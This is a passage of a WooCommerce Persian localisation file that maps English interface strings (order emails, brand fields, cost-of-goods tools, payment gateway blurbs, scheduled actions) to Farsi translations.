refunded.'=>'سفارش شما از %s بازپرداخت شده است.','Your order from %s has been partially refunded.'=>'سفارش شما از %s به‌صورت جزئی بازپرداخت شده است.','We’ve received your order and it’s currently on hold until we can confirm your payment has been processed.'=>'ما سفارش شما را دریافت کردیم و در حال حاضر در حالت تعلیق است تا زمانی که بتوانیم تایید کنیم که پرداخت شما پردازش شده است.','Set your new password.'=>'رمز عبور جدید خود را تنظیم کنید.','You can access your account area to view orders, change your password, and more via the link below:'=>'برای مشاهده سفارشات، تغییر رمز عبور و موارد دیگر می‌توانید از طریق پیوند زیر به قسمت حساب کاربری خود دسترسی داشته باشید:','Username: %s'=>'نام کاربری: %s','Thanks for creating an account on %s. Here’s a copy of your user details.'=>'از اینکه یک حساب کاربری در %s ایجاد کردید سپاسگزاریم. در اینجا یک رونوشت از جزئیات کاربر شما وجود دارد.','Here’s a reminder of what you’ve ordered:'=>'در اینجا یادآوری چیزی است که شما سفارش داده‌اید:','Hi,'=>'درود،','You’ve received a new order from %s:'=>'یک سفارش جدید از %s دریافت کرده‌اید:','We’re getting in touch to let you know that order #%1$s from %2$s has been cancelled.'=>'ما در حال تماس هستیم تا به شما اطلاع دهیم که سفارش #%1$s از %2$s لغو شده است.','Unfortunately, the payment for order #%1$s from %2$s has failed. The order was as follows:'=>'متأسفانه پرداخت برای سفارش شمارهٔ %1$s از %2$s ناموفق بوده است. جزئیات سفارش به شرح زیر است:','Enter your coupon code'=>'کد کوپن خود را وارد کنید','%s is not a valid numeric value.'=>'%s یک مقدار عددی معتبر نیست.','%s is not a valid numeric value: there should be one decimal separator and it has to be after the thousands separator.'=>'%s یک مقدار عددی معتبر نیست: باید یک جداکننده اعشاری وجود داشته باشد و باید بعد از جداکننده هزارگان باشد.','%1$s is not a valid numeric value. Allowed characters are numbers, the thousand (%2$s), and decimal (%3$s) separators.'=>'%1$s مقدار عددی معتبری نیست. کاراکترهای مجاز، اعداد، جداکننده هزارگان (%2$s) و جداکننده اعشاری (%3$s) هستند.','Brand ID'=>'شناسه برند','Brand URL.'=>'URL برند.','List of brands, if applicable.'=>'فهرست برندها، در صورت وجود.','Number of reviews for products of this brand.'=>'تعداد نقد و بررسی‌های محصولات این برند.','Brand link'=>'پیوند برند','Brand slug'=>'نامک برند','Brand name'=>'نام برند','List of grouped product ids.'=>'لیستی از شناسه‌های محصولات گروهی.','List of grouped product IDs, if applicable.'=>'لیست شناسه‌های محصولات گروهی، در صورت وجود.','Order notes.'=>'یادداشت‌های سفارش.','Selected payment method for the order.'=>'روش پرداخت انتخاب شده برای سفارش.','Invalid brand ID.'=>'شناسه برند نامعتبر است.','Invalid brand slug.'=>'نامک برند نامعتبر است.','Brand image.'=>'تصویر برند.','Limit result set to products assigned a set of tag IDs or slugs, separated by commas.'=>'مجموعه نتایج را به محصولاتی محدود کنید که به مجموعه‌ای از شناسه‌ها یا نامک‌های برچسب اختصاص داده شده‌اند (با ویرگول از هم جدا شوند).','Operator to compare product taxonomies terms.'=>'عملگر برای مقایسهٔ واژگان طبقه بندی محصولات.','Limit result set to products assigned a set of taxonomies IDs or slugs, separated by commas.'=>'مجموعه نتایج را به محصولاتی محدود کنید که به مجموعه‌ای از شناسه‌ها یا نامک‌های دسته‌بندی اختصاص داده شده‌اند (با ویرگول از هم جدا شوند).','Operator to compare product brand terms.'=>'عملگر برای مقایسهٔ شرایط برند محصول.','Limit result set to products assigned a set of brand IDs or slugs, separated by commas.'=>'مجموعه نتایج را به محصولاتی محدود کنید که مجموعه‌ای از شناسه‌های برند یا نامک‌ها (slug) به آنها اختصاص داده شده و با کاما از هم جدا شده‌اند.','Limit result set to products assigned a set of category IDs or slugs, separated by commas.'=>'مجموعه نتایج را به محصولاتی محدود کنید که مجموعه‌ای از شناسه‌های دسته‌بندی یا نامک‌ها را به آنها اختصاص داده شده است و با کاما از هم جدا شده‌اند.','Additional fields related to the order.'=>'فیلدهای اضافی مربوط به سفارش.','A description of the purpose of the email template.'=>'توضیحی در مورد هدف از قالب ایمیل.','The display name of the email template.'=>'نام نمایشی قالب ایمیل.','%s is not a valid template for this order.'=>'%s الگوی معتبری برای این سفارش نیست.','Order already has a billing email.'=>'سفارش از قبل ایمیل پرداخت دارد.','A unique ID string for the email template.'=>'یک رشته شناسه منحصر به فرد برای الگوی ایمیل.','Order Actions'=>'اقدامات سفارش','Billing email updated to %s.'=>'ایمیل صورتحساب به %s بروز رسانی شد.','Email Template'=>'قالب ایمیل','Homepage URL'=>'URL صفحه اصلی','Site'=>'سایت','Site Title'=>'عنوان سایت','Block Email Editor (alpha)'=>'ویرایشگر ایمیل بلاک (آلفا)','Enable blueprint to import and export settings in bulk'=>'فعال کردن طرح اولیه برای درون ریزی و برون ریزی تنظیمات به صورت عمده','Enable modern email design for transactional emails'=>'طراحی ایمیل مدرن را برای ایمیل‌های تراکنشی فعال کنید','⚠ Usage tracking must be enabled to use remote logging.'=>'⚠ برای استفاده از ثبت وقایع از راه دور، باید قابلیت ردیابی میزان استفاده فعال باشد.','Allow WooCommerce to send error logs and non-sensitive diagnostic data to help improve WooCommerce. This feature requires %1$susage tracking%2$s to be enabled.'=>'به ووکامرس اجازه دهید گزارش‌های خطا و داده‌های تشخیصی غیر حساس را برای کمک به بهبود ووکامرس ارسال کند. این ویژگی مستلزم فعال بودن ردیابی استفاده %1$s%2$s است.','Basic template for WooCommerce transactional emails used in the email editor'=>'قالب پایه برای ایمیل‌های تراکنشی ووکامرس که در ویرایشگر ایمیل استفاده می‌شود','This tool will generate the necessary Cost of Goods Sold (COGS) related columns in the product meta lookup table, and populate them from existing product data.'=>'این ابزار ستون‌های لازم مربوط به هزینه کالاهای فروخته شده (COGS) را در جدول جستجوی متا محصول ایجاد کرده و آنها را از داده‌های موجود محصول پر می‌کند.','Woo Email Template'=>'قالب ایمیل وو','Woo Email Content Pattern'=>'الگوی محتوای ایمیل ووکامرس','Whether to update the billing email of the order, even if it already has one.'=>'اینکه آیا ایمیل صورتحساب سفارش بروز رسانی شود، حتی اگر از قبل وجود داشته باشد.','Enable the block-based email editor for transactional emails.'=>'ویرایشگر ایمیل بلوکی را برای ایمیل‌های تراکنشی فعال کنید.','GoCardless'=>'GoCardless','Billie'=>'Billie','MONEI'=>'MONEI','Create columns'=>'ایجاد ستون‌ها','Remove columns'=>'حذف ستون‌ها','This tool will remove the Cost of Goods Sold (COGS) related columns from the product meta lookup table. COGS will continue working (if the feature is enabled) but some functionality will not be available.'=>'این ابزار ستون‌های مربوط به بهای تمام‌شده کالاهای فروخته‌شده (COGS) را از جدول جستجوی متای محصول حذف می‌کند. COGS به کار خود ادامه خواهد داد (در صورت فعال بودن این ویژگی) اما برخی از قابلیت‌ها در دسترس نخواهند بود.','Create COGS columns in the product meta lookup table'=>'ستون‌های COGS را در جدول جستجوی متای محصول ایجاد کنید','Remove COGS columns from the product meta lookup table'=>'ستون‌های COGS را از جدول جستجوی متای محصول حذف کنید','Billie is the leading provider of Buy Now, Pay Later payment methods for B2B stores.'=>'بیلی ارائه دهنده پیشرو در روش های پرداخت «الان بخر، بعداً پرداخت کن» برای فروشگاه های B2B است.','Accept Cards, Apple Pay, Google Pay, Bizum, PayPal, and many more payment methods in your store.'=>'کارت‌ها، اپل پی، گوگل پی، بیزوم، پی‌پال و بسیاری از روش‌های پرداخت دیگر را در فروشگاه خود بپذیرید.','Effortlessly accept cryptocurrency payments in your store.'=>'به راحتی پرداخت‌های ارز دیجیتال را در فروشگاه خود بپذیرید.','A full checkout experience embedded on your site that includes all popular payment methods (Pay Now, Pay Later, Financing, Installments).'=>'یک تجربه پرداخت کامل که در سایت شما تعبیه شده است و شامل تمام روش‌های پرداخت محبوب (پرداخت فوری، پرداخت در آینده، تأمین مالی، اقساطی) می‌شود.','Wallets & Express checkouts'=>'کیف پول و تسویه حساب سریع','The link to mark the suggestion as attached. This should be called when an extension is installed.'=>'لینکی برای علامت‌گذاری پیشنهاد به عنوان پیوست. این لینک باید هنگام نصب افزونه فراخوانی شود.','Dummy Product Variation'=>'تنوع محصول ساختگی','Accept all popular payment methods for Finnish B2C and B2B customers'=>'تمام روش‌های پرداخت محبوب برای مشتریان فنلاندی B2C و B2B را بپذیرید','Dummy Product'=>'محصول ساختگی','Paytrail'=>'مسیر پرداخت','The URL to attach the suggestion.'=>'آدرس اینترنتی (URL) برای پیوست کردن پیشنهاد.','Template nameVariable Product Add to Cart + Options'=>'محصول متغیر افزودن به سبد خرید + گزینه‌ها','Template nameSimple Product Add to Cart + Options'=>'محصول ساده افزودن به سبد خرید + گزینه‌ها','Template used to display the Add to Cart + Options form for Grouped Products.'=>'الگوی مورد استفاده برای نمایش فرم افزودن به سبد خرید + گزینه ها برای محصولات گروه بندی شده.','Template nameGrouped Product Add to Cart + Options'=>'افزودن به سبد خرید + گزینه‌ها برای محصول گروهی','Template used to display the Add to Cart + Options form for External Products.'=>'قالب مورد استفاده برای نمایش فرم افزودن به سبد خرید + گزینه‌ها برای محصولات بیرونی.','Template used to display the Add to Cart + Options form for Simple Products.'=>'قالب مورد استفاده برای نمایش فرم افزودن به سبد خرید + گزینه‌ها برای محصولات ساده.','Template used to display the Add to Cart + Options form for Variable Products.'=>'قالب مورد استفاده برای نمایش فرم افزودن به سبد خرید + گزینه‌ها برای محصولات متغیر.','Validation failed.'=>'اعتبارسنجی ناموفق بود.','Please provide a valid %s'=>'لطفا یک %s معتبر ارائه دهید','Successfully connected to %s.'=>'با موفقیت به %s متصل شد.','An error occurred while saving address details: %s'=>'هنگام ذخیره جزئیات آدرس خطایی روی داد: %s','Integrations'=>'یکپارچه‌سازی‌ها','Account and Privacy'=>'حساب کاربری و حریم خصوصی','You are not allowed to make this request.'=>'شما مجاز به ارائه این درخواست نیستید.','Invalid country code.'=>'کد کشور نامعتبر است.','Country code.'=>'کد کشور.','Great things are coming soon'=>'چیزهای بزرگی به زودی در راه است','General Email'=>'ایمیل عمومی','A general template for emails.'=>'یک قالب عمومی برای ایمیل‌ها.','Invalid post'=>'نوشته نامعتبر','Custom Email Styles'=>'استایل سفارشی ایمیل','Access discounted shipping rates with USPS, UPS, and DHL.'=>'با USPS، UPS و DHL به نرخ‌های ارسال تخفیف‌دار دسترسی پیدا کنید.','A collection of email content layouts.'=>'مجموعه‌ای از طرح‌بندی‌های محتوای ایمیل.','%1$s is not of type %2$s.'=>'%1$s از نوع %2$s نیست.','Invalid field.'=>'فیلد نامعتبر.فیلد نامعتبر.','The step definition to import'=>'تعریف مرحله برای وارد کردن','Site Visibility'=>'قابلیت مشاهده سایت','Block pattern categoryEmail Contents'=>'محتوای ایمیل','Blueprint step definition size exceeds maximum limit of %s MB'=>'اندازه تعریف مرحله طرح از حداکثر حد %s مگابایت تجاوز می‌کند','Includes all settings in WooCommerce | Settings | Tax.'=>'این شامل تمام تنظیمات در ووکامرس | تنظیمات | مالیات می‌شود.','Includes all settings in WooCommerce | Settings | Shipping.'=>'این شامل تمام تنظیمات در ووکامرس | تنظیمات | حمل و نقل می‌شود.','Includes all settings in WooCommerce | Settings | Visibility.'=>'شامل تمام تنظیمات در ووکامرس | تنظیمات | قابلیت مشاهده می‌شود.','Includes all settings in WooCommerce | Settings | Products.'=>'شامل تمام تنظیمات در ووکامرس | تنظیمات | محصولات می‌شود.','Includes all settings in WooCommerce | Settings | Integrations.'=>'شامل تمام تنظیمات در ووکامرس | تنظیمات | ادغام‌ها می‌شود.','Includes all settings in WooCommerce | Settings | Emails.'=>'شامل تمام تنظیمات در ووکامرس | تنظیمات | ایمیل‌ها می‌شود.','Includes all settings in WooCommerce | Settings | Advanced.'=>'شامل تمام تنظیمات در ووکامرس | تنظیمات | پیشرفته است.','Includes all settings in WooCommerce | Settings | Account and Privacy.'=>'شامل تمام تنظیمات در ووکامرس | تنظیمات | حساب کاربری و حریم خصوصی می‌شود.','Includes all settings in WooCommerce | Settings | General.'=>'شامل تمام تنظیمات در ووکامرس | تنظیمات | عمومی می‌شود.','Includes all settings in WooCommerce | Settings | Payments.'=>'شامل تمام تنظیمات در ووکامرس | تنظیمات | پرداخت‌ها می‌شود.','Add to Cart + Options'=>'افزودن به سبد خرید + گزینه‌ها','Template nameExternal Product Add to Cart + Options'=>'افزودن به سبد خرید + گزینه‌ها برای محصول بیرونی','The Add to Cart + Options templates allow defining a different layout for each product type.'=>'قالب‌های افزودن به سبد خرید + گزینه‌ها امکان تعریف چیدمان متفاوت برای هر نوع محصول را فراهم می‌کنند.','Invalid email'=>'ایمیل نامعتبر','Bcc(s)'=>'Bcc(s)','Cc(s)'=>'Cc(s)','scheduled actions'=>'اقدامات برنامه ریزی شده','scheduled action'=>'اقدام برنامه ریزی شده','There was an error cancelling the %1$s: %2$s'=>'خطایی به نام %1$s رخ داده است: %2$s','Detailed information about registered sources is not currently available.'=>'اطلاعات دقیقی در مورد منابع ثبت شده در حال حاضر در دسترس نیست.','Unable to retrieve action %d.'=>'قادر به بازیابی اقدام %d نیست.','There was an error creating the scheduled action: %s'=>'خطایی در ایجاد اقدام زمان‌بندی شده رخ داد: %s','%1$s action (%2$d) scheduled.'=>'%1$s اقدام (%2$d) برنامه‌ریزی شد.','Unable to create a scheduled action.'=>'قادر به ایجاد یک اقدام زمان‌بندی‌شده نیست.','Request to cancel scheduled actions completed.'=>'درخواست لغو اقدامات زمان‌بندی‌شده‌ی تکمیل‌شده.','Unable to cancel scheduled action: check the logs.'=>'لغو اقدام زمان‌بندی‌شده امکان‌پذیر نیست: گزارش‌ها را بررسی کنید.','WP CLI commands are available: execute %1$s for a list of available commands.'=>'دستورات WP CLI در دسترس هستند: برای مشاهده لیستی از دستورات موجود، %1$s را اجرا کنید.','WP CLI'=>'WP CLI','Action Scheduler is currently being loaded from the following location. This can be useful when debugging, or if requested by the support team.'=>'در حال حاضر، برنامه‌ریز عملیات از مسیر زیر در حال بارگذاری است. این می‌تواند هنگام اشکال‌زدایی یا در صورت درخواست تیم پشتیبانی مفید باشد.','Cart is not available. This may indicate that the function is being called before woocommerce_init or in an admin context.'=>'سبد خرید در دسترس نیست. این ممکن است نشان دهد که تابع قبل از woocommerce_init یا در یک زمینه مدیریتی فراخوانی می‌شود.','Enter Bcc recipients (comma-separated) for this email.'=>'گیرندگان Bcc را برای این ایمیل (با کاما از هم جدا شده) وارد کنید.','Enter Cc recipients (comma-separated) for this email.'=>'گیرندگان رونوشت (Cc) را برای این ایمیل وارد کنید (با کاما از هم جدا شوند).','Congratulations on the sale!'=>'تبریک برای فروش!','New order: #{order_number}'=>'سفارش جدید: #{order_number}','Missing required data'=>'داده‌های مورد نیاز موجود نیست','Scheduled action cancelled.'=>'اقدام برنامه ریزی شده لغو شد.','Please specify hook and/or group of actions to cancel.'=>'لطفا قلاب و/یا گروه اقدامات مورد نظر برای لغو را مشخص کنید.','Please specify hook of action to cancel.'=>'لطفا مسیر لغو را مشخص کنید.','%1$d %2$s action scheduled.'=>'%1$d %2$s اقدام برنامه‌ریزی شده است.','%1$d action %2$s.'=>'%1$d اقدام %2$s.','%2$d failure.'=>'%2$d شکست.','Creating %d action'=>'ایجاد %d اقدام','Deleted %1$d action'=>'%1$d اقدام حذف شد','Deleting %d action'=>'حذف %d اقدام','Executed %d action.'=>'%d اقدام انجام شد.','Executing %d action'=>'اجرای %d اقدام','[{site_title}]: You\'ve got a new order: #{order_number}'=>'[{site_title}]: مشترک گرامی ! شما یک سفارش جدید دارید: #{order_number}','We hope they’ll be back soon! Read more about troubleshooting failed payments.'=>'امیدواریم به زودی برگردند! درباره عیب‌یابی پرداخت‌های ناموفق بیشتر بخوانید.','Reset your password'=>'رمز عبور خود را بازنشانی کنید','Reset your password for {site_title}'=>'رمز عبور خود را برای {site_title} بازنشانی کنید','Select who should be notified if an order that was previously processing or on-hold has failed.'=>'انتخاب کنید که در صورت عدم موفقیت سفارشی که قبلاً در حال پردازش یا در انتظار بوده است، به چه کسی اطلاع داده شود.','Partial refund: Order {order_number}'=>'بازپرداخت جزئی: سفارش {order_number}','Order refunded: {order_number}'=>'مبلغ سفارش مسترد شد: {order_number}','Order failed: #{order_number}'=>'سفارش ناموفق بود: #{order_number}','A note has been added to your order from {site_title}'=>'یادداشتی از {site_title} به سفارش شما اضافه شد','Thanks again! If you need any help with your order, please contact us at {store_email}.'=>'باز هم ممنون! اگر برای سفارش خود به راهنمایی نیاز دارید، لطفا با ما در {store_email} تماس بگیرید.','Your order from {site_title} is on its way!'=>'سفارش شما از {site_title} در راه است!','If you need any help with your order, please contact us at {store_email}.'=>'اگر برای سفارش خود به راهنمایی نیاز دارید، لطفا با ما در {store_email} تماس بگیرید.','Order cancelled: #{order_number}'=>'سفارش لغو شده: #{order_number}','The selected product is invalid.'=>'محصول انتخابی نامعتبر است.','Brands: '=>'برندها: ','An error occurred while saving account details: %s'=>'هنگام ذخیره جزئیات حساب کاربری خطایی روی داد: %s','Good things are heading your way!'=>'اتفاقات خوبی در راه است!','WC_Session is not available, customer data cannot be saved to session.'=>'WC_Session در دسترس نیست، داده‌های مشتری را نمی‌توان در session ذخیره کرد.','The product with SKU (%1$s) you are trying to insert is already present in the lookup table'=>'محصولی با شناسه‌ی شناسایی (SKU) (%1$s) که می‌خواهید وارد کنید، از قبل در جدول جستجو موجود است','To: %s'=>'به: %s','Bcc: %s'=>'Bcc: %s','Cc: %s'=>'Cc: %s','Logo width (px)'=>'عرض لوگو (px)','Auto-sync with theme'=>'همگام‌سازی خودکار با پوسته','%s (default)'=>'%s (پیشفرض)','Retain refunded orders'=>'نگه داشتن سفارش‌های مرجوعی','Cost (%s)'=>'هزینه (%s)','Cost value'=>'مقدار هزینه','Retain refunded orders for a specified duration before anonymizing the personal data within them.'=>'سفارش‌های بازپرداخت‌شده را قبل از ناشناس‌سازی داده‌های شخصی درون آنها، برای مدت زمان مشخصی نگهداری کنید.','Add the amount it costs you to buy or make this product.'=>'مبلغی را که برای خرید یا ساخت این محصول هزینه می‌کنید، اضافه کنید.','Enter cost value (%s)'=>'مقدار هزینه (%s) را وارد کنید','Blueprint (beta)'=>'طرح اولیه (بتا)','Remove custom costs'=>'حذف هزینه‌های سفارشی','Cost of goods'=>'هزینه کالا','Automatically update email styles when theme styles change'=>'بروز رسانی خودکار استایل‌های ایمیل با تغییر استایل‌های پوسته','Add the amount it costs you to buy or make this product. Leave blank to use the default value from "General".'=>'مبلغی را که برای خرید یا ساخت این محصول هزینه می‌کنید، اضافه کنید. برای استفاده از مقدار پیشفرض «عمومی»، خالی بگذارید.','The custom cost of goods sold values will revert back to their defaults for all the variations. Would you like to continue?'=>'مقادیر بهای تمام‌شده‌ی سفارشی کالاهای فروخته‌شده برای تمام تغییرات به مقادیر پیشفرض خود برمی‌گردند. آیا مایل به ادامه هستید؟','Add the amount it costs you to buy or make this product. This will be applied as the default value for variations.'=>'مبلغی را که برای خرید یا ساخت این محصول هزینه می‌کنید، اضافه کنید. این به عنوان مقدار پیش‌فرض برای تنوع‌ها اعمال خواهد شد.','block descriptionAllow customers to create an account after their purchase.'=>'به مشتریان اجازه دهید پس از خرید، یک حساب کاربری ایجاد کنند.','Test account'=>'حساب آزمایشی','Helio Pay'=>'Helio Pay','Offer cryptocurrency payment options to your shoppers.'=>'گزینه‌های پرداخت رمزارز را به خریداران خود پیشنهاد دهید.','Crypto Payments'=>'پرداخت‌های رمزارز','Grow and retain customers with email, SMS, automations, and a consolidated view of customer interactions.'=>'با ایمیل، پیامک، اتوماسیون‌ها و نمای یکپارچه از تعاملات مشتریان، مشتریان را رشد دهید و حفظ کنید.','If true, the effective value is the base value from the parent product plus the defined value; if false, the defined value is the final effective value.'=>'اگر درست باشد، مقدار مؤثر، مقدار پایه از حاصلضرب والد به علاوه مقدار تعریف‌شده است؛ اگر نادرست باشد، مقدار تعریف‌شده، مقدار مؤثر نهایی است.','Applies to variations only. If true, the effective value is the base value from the parent product plus the defined value; if false, the defined value is the final effective value.'=>'فقط برای تغییرات اعمال می‌شود. اگر درست باشد، مقدار مؤثر، مقدار پایه از حاصلضرب والد به علاوه مقدار تعریف‌شده است؛ اگر نادرست باشد، مقدار تعریف‌شده، مقدار مؤثر نهایی است.','Usage tracking activated'=>'ردیابی میزان استفاده فعال شد','Invalid nonce.'=>'عدم اعتبار.','Price: From {{min}}'=>'قیمت: از {{min}}','Price: Up to {{max}}'=>'قیمت: تا {{max}}','Price: {{min}} - {{max}}'=>'قیمت: {{min}} - {{max}}','Price: From %s'=>'قیمت: از %s','Price: Up to %s'=>'قیمت: تا %s','Price: %1$s - %2$s'=>'قیمت: %1$s - %2$s','Order failed'=>'سفارش ناموفق بود','Order completed'=>'سفارش تکمیل شد','Order refunded'=>'سفارش مرجوع شد','Order cancelled'=>'سفارش لغو شد','Successfully disconnected from %1$s.'=>'ارتباط با %1$s با موفقیت قطع شد.','Remove filter: %s'=>'فیلتر را حذف کنید: %s','Rating: {{label}}'=>'امتیاز: {{label}}','Rating: Rated %d out of 5'=>'امتیاز: %d از 5','Remove filter: {{label}}'=>'فیلتر را حذف کنید: {{label}}','Task Configurations'=>'پیکربندی‌های وظیفه','Used in the heading of the coming soon pageWhere cycling dreams take flight.'=>'جایی که رویاهای دوچرخه‌سواری به پرواز در می‌آیند.','Status: {{label}}'=>'وضعیت: {{label}}وضعیت: {{label}}','Onboarding Configuration'=>'پیکربندی آن‌بوردینگ','Used in the paragraph of the coming soon pageDedicated to providing top-quality bikes, accessories, and expert advice for riders of all experience levels. Stay tuned.'=>'متعهد به ارائه دوچرخه‌های باکیفیت، لوازم جانبی و مشاوره تخصصی برای دوچرخه‌سواران با هر سطح تجربه. با ما همراه باشید.','Includes all the items featured in WooCommerce | Settings.'=>'شامل تمام موارد نمایش داده شده در | Settings | ووکامرس است.','Includes the task configurations for WooCommerce.'=>'شامل تنظیمات وظایف برای ووکامرس است.','Includes onboarding configuration options'=>'شامل گزینه‌های پیکربندی ورود به سیستم','Status: %s'=>'وضعیت : %s','Includes all the installed themes.'=>'شامل همه پوسته‌های نصب شده است.','5 of 5 stars'=>'۵ از ۵ ستاره','4 of 5 stars'=>'۴ از ۵ ستاره','3 of 5 stars'=>'۳ از ۵ ستاره','2 of 5 stars'=>'۲ از ۵ ستاره','1 of 5 stars'=>'۱ از ۵ ستاره','Hide password'=>'مخفی‌سازی رمز عبور','Show password'=>'نمایش رمز عبور','Your account with %s is using a temporary password. We emailed you a link to change your password.'=>'حساب‌کاربری شما در %s از یک رمز عبور موقت استفاده می‌کند. ما پیوندی برای تغییر رمز عبور برای شما ایمیل کردیم.','Warning: Sale prices will be removed if they are not lower than regular prices.'=>'هشدار: قیمت‌های حراج در صورتی که کمتر از قیمت‌های عادی نباشند، حذف خواهند شد.','Used in the heading of the coming soon pageopening soon'=>'به زودی افتتاح می‌شود','Exclude product variations with any of the statuses from result set.'=>'تغییرات محصول با هر یک از وضعیت‌ها را از مجموعه نتایج حذف کنید.','Limit result set to product variations with any of the statuses.'=>'محدود کردن مجموعه نتایج به تغییرات محصول با هر یک از وضعیت‌ها.','Limit result set to downloadable product variations.'=>'محدود کردن مجموعه نتایج به تغییرات محصول قابل دانلود.','Limit result set to virtual product variations.'=>'محدود کردن مجموعه نتایج به تغییرات محصول مجازی.','block titleProduct Summary'=>'خلاصه محصول','block descriptionDisplay a short description about a product.'=>'نمایش توضیحی کوتاه درباره یک محصول.','block descriptionDisplay an input field customers can use to select the number of products to add to their cart. '=>'نمایش فیلد ورودی برای انتخاب تعداد محصولات برای افزودن به سبد خرید.','Products in cart'=>'محصولات در سبد خرید','Page not found'=>'برگه یافت نشد','Action needed'=>'اقدام لازم است','Sync with theme'=>'همگام‌سازی با پوسته','WooCommerce Settings'=>'تنظیمات ووکامرس','Sorry, your order on %1$s was unsuccessful. Your order details are below, with a link to try your payment again: %2$s'=>'متاسفانه ! سفارش شما در %1$s ناموفق بود. جزئیات سفارش شما در زیر آمده است، با پیوندی برای تلاش دوباره برای پرداخت: %2$s','Order status slug.'=>'نامک وضعیت سفارش.','Stock availability text.'=>'متن موجودی انبار.','Stock availability class.'=>'کلاس موجودی انبار.','Information about the product\'s availability.'=>'اطلاعات درباره در دسترس بودن محصول.','Order statuses not found'=>'وضعیت سفارش یافت نشد','Enables rate limiting for Checkout place order and Store API /checkout endpoint. To further control this, refer to rate limiting documentation.'=>'امکان محدود کردن نرخ برای سفارش در محل تسویه حساب و API فروشگاه /checkout endpoint را فراهم می‌کند. برای کنترل بیشتر به مستندات محدود کردن نرخ مراجعه کنید.','Rate limit Checkout'=>'محدودیت نرخ تسویه حساب','HPOS Data Caching'=>'ذخیره‌سازی داده‌های HPOS','Tilopay'=>'Tilopay','Credit/debit cards, Apple Pay, Google Pay, and more.'=>'کارت‌های اعتباری/نقدی، اپل پی، گوگل پی و بیشتر.','PayU India'=>'PayU هند','Affirm\'s tailored Buy Now Pay Later programs remove price as a barrier, turning browsers into buyers, increasing average order value, and expanding your customer base.'=>'برنامه‌های سفارشی «الان بخر، بعداً پرداخت کن» افیرم، قیمت را به عنوان یک مانع از میان برمی‌دارند، جستجوکنندگان را به خریدار تبدیل می‌کنند، میانگین ارزش سفارش را افزایش می‌دهند و پایگاه مشتریان شما را گسترش می‌دهند.','Accept credit and debit cards on your WooCommerce store with advanced features like partial refunds, full/partial captures, and 3D Secure security.'=>'کارت‌های اعتباری و نقدی را در فروشگاه ووکامرس خود با ویژگی‌های پیشرفته‌ای مانند بازپرداخت جزئی، ضبط کامل/جزئی و امنیت سه بعدی امن بپذیرید.','Securely accept credit and debit cards with one low rate, no surprise fees (custom rates available). Sell in store and track sales and inventory in one place.'=>'با خیال راحت کارت‌های اعتباری و نقدی را با یک نرخ پایین و بدون کارمزدهای غافلگیرکننده (نرخ‌های سفارشی موجود است) بپذیرید. در فروشگاه بفروشید و فروش و موجودی را در یک مکان پیگیری کنید.','Enable PayU\'s exclusive plugin for WooCommerce to start accepting payments in 100+ payment methods available in India including credit cards, debit cards, UPI, & more!'=>'افزونه اختصاصی PayU را برای WooCommerce فعال کنید تا بتوانید پرداخت‌ها را با بیش از ۱۰۰ روش پرداخت موجود در هند از جمله کارت‌های اعتباری، کارت‌های نقدی، UPI و موارد دیگر بپذیرید!','Payoneer Checkout is the next generation of payment processing platforms, giving merchants around the world the solutions and direction they need to succeed in today\'s hyper-competitive global market.'=>'پرداخت پایونیر (Payoneer Checkout) نسل بعدی پلتفرم‌های پردازش پرداخت است که به بازرگانان در سراسر جهان، راهکارها و جهت‌گیری‌های لازم برای موفقیت در بازار جهانی فوق‌العاده رقابتی امروز را ارائه می‌دهد.','A European payments solution that allows you to accept payments in over 25 countries and multiple currencies.'=>'یک راهکار پرداخت اروپایی که به شما امکان می‌دهد پرداخت‌ها را در بیش از ۲۵ کشور و ارزهای مختلف بپذیرید.','Clearpay allows customers to receive products immediately and pay for purchases over four installments, always interest-free.'=>'پرداخت شفاف به مشتریان این امکان را می‌دهد که محصولات را بلافاصله دریافت کنند و خریدهای خود را همیشه در چهار قسط و بدون بهره پرداخت کنند.','Clearpay'=>'پرداخت شفاف','Accept payments with Woo'=>'پرداخت‌ها را با ووکامرس بپذیرید','Viva.com Smart Checkout'=>'پرداخت هوشمند Viva.com','Stripe'=>'نوار','Safe and secure payments using your customer\'s PayPal account.'=>'پرداخت‌های ایمن و مطمئن با استفاده از حساب پی‌پال مشتری شما.','PayPal Payments lets you offer PayPal, Venmo (US only), Pay Later options and more.'=>'پرداخت‌های پی‌پال به شما امکان می‌دهد گزینه‌های پی‌پال، ونمو (فقط در ایالات متحده)، پرداخت در آینده و موارد دیگر را ارائه دهید.','Paymob is a leading payment gateway in the Middle East and Africa. Accept payments online and in-store with Paymob.'=>'پرداخت با موبایل یک درگاه پرداخت پیشرو در خاورمیانه و آفریقا است. پرداخت‌های آنلاین و درون فروشگاهی را با Paymob بپذیرید.','Paymob'=>'پرداخت با موبایل','The Payfast extension for WooCommerce enables you to accept payments by Credit Card and EFT via one of South Africa\'s most popular payment gateways. No setup fees or monthly subscription costs. Selecting this extension will configure your store to use South African rands as the selected currency.'=>'افزونه Payfast برای ووکامرس به شما این امکان را می‌دهد که پرداخت‌ها را با کارت اعتباری و EFT از طریق یکی از محبوب‌ترین درگاه‌های پرداخت آفریقای جنوبی بپذیرید. بدون هزینه راه‌اندازی یا هزینه اشتراک ماهانه. انتخاب این افزونه، فروشگاه شما را برای استفاده از راند آفریقای جنوبی به عنوان ارز انتخابی پیکربندی می‌کند.','Your trusted payments partner in Asia and around the world.'=>'شریک قابل اعتماد پرداخت شما در آسیا و سراسر جهان.','Antom'=>'Antom','The category of the suggestion.'=>'دسته بندی پیشنهاد.','The tags associated with the suggestion.'=>'برچسب‌های مرتبط با پیشنهاد.','The URL of the icon (square aspect ratio).'=>'آدرس اینترنتی (URL) آیکون (با نسبت ابعاد مربع).','The description of the suggestion.'=>'شرح پیشنهاد.','The title of the suggestion.'=>'عنوان پیشنهاد.','The type of the suggestion.'=>'نوع پیشنهاد.','The priority of the suggestion.'=>'اولویت پیشنهاد.','The unique identifier for the suggestion.'=>'شناسه منحصر به فرد برای پیشنهاد.','A suggestion with full details.'=>'یک پیشنهاد با جزئیات کامل.','The link to hide the suggestion.'=>'لینکی برای پنهان کردن پیشنهاد.','The URL to dismiss the incentive.'=>'نشانی اینترنتی (URL) برای رد کردن انگیزه.','The link to dismiss the incentive.'=>'لینکی برای رد کردن انگیزه.','Context ID in which the incentive was dismissed.'=>'شناسه زمینه‌ای که در آن مشوق رد شده است.','The badge label for the incentive.'=>'برچسب نشان برای طرح تشویقی.','The URL to the terms and conditions for the incentive.'=>'آدرس اینترنتی (URL) شرایط و ضوابط طرح تشویقی.','The call to action label for the incentive.'=>'برچسب فراخوان برای اقدام (call to action) برای انگیزه.','The short description of the incentive. It can 